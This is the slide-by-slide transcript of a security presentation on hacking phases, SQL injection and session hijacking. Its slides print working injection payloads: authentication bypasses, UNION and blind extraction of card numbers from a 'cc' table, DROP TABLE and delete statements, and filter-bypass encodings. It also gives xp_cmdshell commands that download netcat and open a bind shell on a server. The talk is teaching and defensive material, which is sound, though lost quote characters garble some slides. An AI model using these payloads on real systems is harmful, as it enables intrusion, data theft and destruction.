ATTACKING SYSTEM & WEB Desmond Alexander CISSP / GIAC/ GPEN CEO FORESEC

Transcription

1 ATTACKING SYSTEM & WEB Desmond Alexander CISSP / GIAC/ GPEN CEO FORESEC

2 AGENDA VULNERABILITIES OF WEB EXPLOIT METHODS COUNTERMEASURE

3 About Me DIRECTOR OF FORESEC COUNTER TERRORIST ACTION TEAM RESEARCH IN SECURITY STRATEGY - NTU I LOVE SECURITY!!!!!!

4 CAN FIRESALE BE REAL?

5 APPROACH Hackers typically approach an attack using five common phases. It is important to understand these phases of hacking attacks in order to better defend against them. Here we ll discuss the five hacker phases to better understand them and how they relate to each other. This information is useful for network administrators, and essential for network security consultants.

6 Network & Business Reconnaissance Before hacking your Online business or corporate infrastructure, hackers first perform routine and detailed reconnaissance. Hackers must gather as much information about your business and networks as possible. Anything they discover about their target (you) can be valuable during their attack phases. Strategies for hacking rely on a foundation of knowledge and understanding, arising initially from whatever the hacker can learn about you and your business.

7 Network & System Scanning Probing your network can reveal vulnerabilities that create a hit list, or triage list, for hackers to work through. Hackers may be either general hackers or specialized hackers, such as phreakers, but their intent is majorily the same to access information and services that they should not gain access to. Much of the information gather during the hacker s reconnaissance phase now come into play. In many ways, this phase of network scanning is an extension of the reconnaissance phase.

8 Gaining Access to Networks, Applications & Businesses Open ports can lead to a hacker gaining direct access to services and possibly to internal network connections. This pahse of attack is the most important and the most dangerous. Although some hack attacks don t need direct network access to damage your business, such as Denial of Services (DoS), simple methods of attack are available to network-connected hackers including session hijacking, stack-based buffer overflow, and similar security exploits. Smurf attacks try to get network users to respond and the hacker uses their real IP Addresses to flood them with problems.

9 Maintaining Access Hackers may choose to continue attacking and exploiting the target system, or to explore deeper into the target network and look for more systems and services. Not all attackers remain connected to the exploited network, but from a defensive strategy it must be expected. Hackers may deploy programs to maintain access by launching VNC clients from within your network, providing access to external systems, opening Telnet sessions and similarly serious services like FTP and SSH, or upload rootkits and Trojans to infiltrate and exploit your network and systems to the point where they have complete root level control.

10 Cover Their Tracks Most hackers will attempt to cover their footprints and tracks as carefully as possible. Although not always the case, remove proof of a hacker s attacks is their best defense against legal and punitive action. It is most likely that low-end hackers and newbie hackers will get caught at a much higher rate than expert level hackers who know how to remain hidden and anonymous. Gaining root level access and administrative access is a big part of covering one s tracks as the hacker can remove log entries and do so as a privileged administrator as opposed to an unknown hacker.

11 These five phases of a hacker s attack loop back to the beginning. A successful attack with maintained access often results in continuing reconnaissance. The more the hacker learns about your internal operations means the more likely he will be back to intrude and exploit more networks, systems, internal services, and your business resources. As scary as all of these phases and attacks sound, there are tools and methods available to detect, track, expunge, and defend against future attacks for network security professionals.

12 RECON & INFO GATHERING DEMO

13

14 Topics 1. What are injection attacks? 2. How SQL Injection Works 3. Exploiting SQL Injection Bugs 4. Mitigating SQL Injection 5. Other Injection Attacks

15 Injection Injection attacks trick an application into including unintended commands in the data send to an interpreter. Interpreters Interpret strings as commands. Ex: SQL, shell (cmd.exe, bash), LDAP, XPath Key Idea Input data from the application is executed as code by the interpreter.

16 SQL Injection 1. App sends form to user. 2. Attacker submits form with SQL exploit data. 3. Application builds string with exploit data. 4. Application sends SQL query to DB. 5. DB executes query, including exploit, sends data back to application. 6. Application returns data to user. Attacker Form User Pass or 1=1-- Firewall Web Server DB Server

17 SQL Injection in PHP $link = mysql_connect($db_host, $DB_USERNAME, $DB_PASSWORD) or die ("Couldn't connect: ". mysql_error()); mysql_select_db($db_database); $query = "select count(*) from users where username = '$username' and password = '$password "; $result = mysql_query($query);

18 SQL Injection Attack #1 Unauthorized Access Attempt: password = or 1=1 -- SQL statement becomes: select count(*) from users where username = user and password = or 1=1 -- Checks if password is empty OR 1=1, which is always true, permitting access.

19 SQL Injection Attack #2 Database Modification Attack: password = foo ; delete from table users where username like % DB executes two SQL statements: select count(*) from users where username = user and password = foo delete from table users where username like %

20 Exploits of a Mom

21 Finding SQL Injection Bugs 1. Submit a single quote as input. If an error results, app is vulnerable. If no error, check for any output changes. 2. Submit two single quotes. Databases use to represent literal If error disappears, app is vulnerable. 3. Try string or numeric operators. Oracle: FOO MS-SQL: + FOO MySQL: FOO ASCII(1)

22 Injecting into SELECT Most common SQL entry point. SELECT columns FROM table WHERE expression ORDER BY expression Places where user input is inserted: WHERE expression ORDER BY expression Table or column names

23 Injecting into INSERT Creates a new data row in a table. INSERT INTO table (col1, col2,...) VALUES (val1, val2,...) Requirements Number of values must match # columns. Types of values must match column types. Technique: add values until no error. foo )-- foo, 1)-- foo, 1, 1)--

24 Injecting into UPDATE Modifies one or more rows of data. UPDATE table SET col1=val1, col2=val2,... WHERE expression Places where input is inserted SET clause WHERE clause Be careful with WHERE clause OR 1=1 will change all rows

25 UNION Combines SELECTs into one result. SELECT cols FROM table WHERE expr UNION SELECT cols2 FROM table2 WHERE expr2 Allows attacker to read any table foo UNION SELECT number FROM cc-- Requirements Results must have same number and type of cols. Attacker needs to know name of other table. DB returns results with column names of 1 st query.

26 UNION Finding #columns with NULL UNION SELECT NULL-- UNION SELECT NULL, NULL-- UNION SELECT NULL, NULL, NULL-- Finding #columns with ORDER BY ORDER BY 1-- ORDER BY 2-- ORDER BY 3-- Finding a string column to extract data UNION SELECT a, NULL, NULL UNION SELECT NULL, a, NULL-- UNION SELECT NULL, NULL, a --

27 Inference Attacks Problem: What if app doesn t print data? Injection can produce detectable behavior Successful or failed web page. Noticeable time delay or absence of delay. Identify an exploitable URL AND 1=1 AND 1=2 Use condition to identify one piece of data (SUBSTRING(SELECT TOP 1 number FROM cc), 1, 1) = 1 (SUBSTRING(SELECT TOP 1 number FROM cc), 1, 1) = 2... or use binary search technique... (SUBSTRING(SELECT TOP 1 number FROM cc), 1, 1) > 5

28 More Examples (1) Application authentication bypass using SQL injection. Suppose a web form takes userid and password as input. The application receives a user ID and a password and authenticate the user by checking the existence of the user in the USER table and matching the data in the PWD column. Assume that the application is not validating what the user types into these two fields and the SQL statement is created by string concatenation.

29 More Example (2) The following code could be an example of such bad practice: sqlstring = select USERID from USER where USERID = ` & userid & ` and PWD = ` & pwd & ` result = GetQueryResult(sqlString) If(result = ) then userhasbeenauthenticated = False Else userhasbeenauthenticated = True End If

30 More Example (3) User ID: ` OR ``=` Password: `OR ``=` In this case the sqlstring used to create the result set would be as follows: select USERID from USER where USERID = ``OR``=``and PWD = `` OR``=`` select USERID from USER where USERID = ``OR``=``and PWD = `` OR``=`` TRUE TRUE Which would certainly set the userhasbenauthenticated variable to true.

31 More Example (4) User ID: ` OR ``=`` -- Password: abc Because anything after the -- will be ignore, the injection will work even without any specific injection into the password predicate.

32 More Example (5) User ID: ` ; DROP TABLE USER ; -- Password: `OR ``=` select USERID from USER where USERID = `` ; DROP TABLE USER ; -- ` and PWD = ``OR ``=`` I will not try to get any information, I just wan to bring the application down.

33 Beyond Data Retrieval Microsoft's SQL Server supports a stored procedure xp_cmdshell that permits what amounts to arbitrary command execution, and if this is permitted to the web user, complete compromise of the webserver is inevitable. What we had done so far was limited to the web application and the underlying database, but if we can run commands, the webserver itself cannot help but be compromised. Access to xp_cmdshell is usually limited to administrative accounts, but it's possible to grant it to lesser users. With the UTL_TCP package and its procedures and functions, PL/ SQL applications can communicate with external TCP/IP-based servers using TCP/IP. Because many Internet application protocols are based on TCP/IP, this package is useful to PL/ SQL applications that use Internet protocols and .

34 Beyond Data Retrieval Downloading Files exec master..xp_cmdshell tftp GET nc.exe c:\nc.exe Backdoor with Netcat exec master..xp_cmdshell nc.exe -e cmd.exe -l -p 53 Direct Backdoor w/o External Cmds UTL_TCP.OPEN_CONNECTION(' ', 2222, 1521) //charset: 1521 //port: 2222 //host:

35 Impact of SQL Injection 1. Leakage of sensitive information. 2. Reputation decline. 3. Modification of sensitive information. 4. Loss of control of db server. 5. Data loss. 6. Denial of service.

36 The Cause: String Building Building a SQL command string with user input in any language is dangerous. Variable interpolation. String concatenation with variables. String format functions like sprintf(). String templating with variable replacement.

37 Mitigating SQL Injection Ineffective Mitigations Blacklists Stored Procedures Partially Effective Mitigations Whitelists Prepared Queries

38 Blacklists Filter out or Sanitize known bad SQL metacharacters, such as single quotes. Problems: 1. Numeric parameters don t use quotes. 2. URL escaped metacharacters. 3. Unicode encoded metacharacters. 4. Did you miss any metacharacters? Though it's easy to point out some dangerous characters, it's harder to point to all of them.

39 Bypassing Filters Different case SeLecT instead of SELECT or select Bypass keyword removal filters SELSELECTECT URL-encoding %53%45%4C%45%43%54 SQL comments SELECT/*foo*/num/*foo*/FROM/**/cc SEL/*foo*/ECT String Building us er chr(117) chr(115) chr(101) chr(114)

40 DEMO SQL INJECTION on MICROSOFT SQL and MYSQL

41 ADVANCED DEMO CANONICALIZATION

42 Session Hijacking

43 What is Session Hijacking TCP Connection Takeover Takeover of a Web Application Session

44 State Management HTTP is Stateless Web Applications need state User Logins Shopping Carts

45 State Management, Cont d Client Side Server Side Golden Rule of Web Application Security Cookies and Hidden Fields

46 Reasons for Session Hijacking No Standards for Maintaining State Session Tracking and State information at Client

47 How to Prevent Session Hijacking Session Identifiers Should Be Unique Session Identifiers Should Not be Guessable Session Identifiers Should Be Independent Session Identifiers Should be Mapped with Client-Side Connections

48 SSL HIJACKING DEMO 48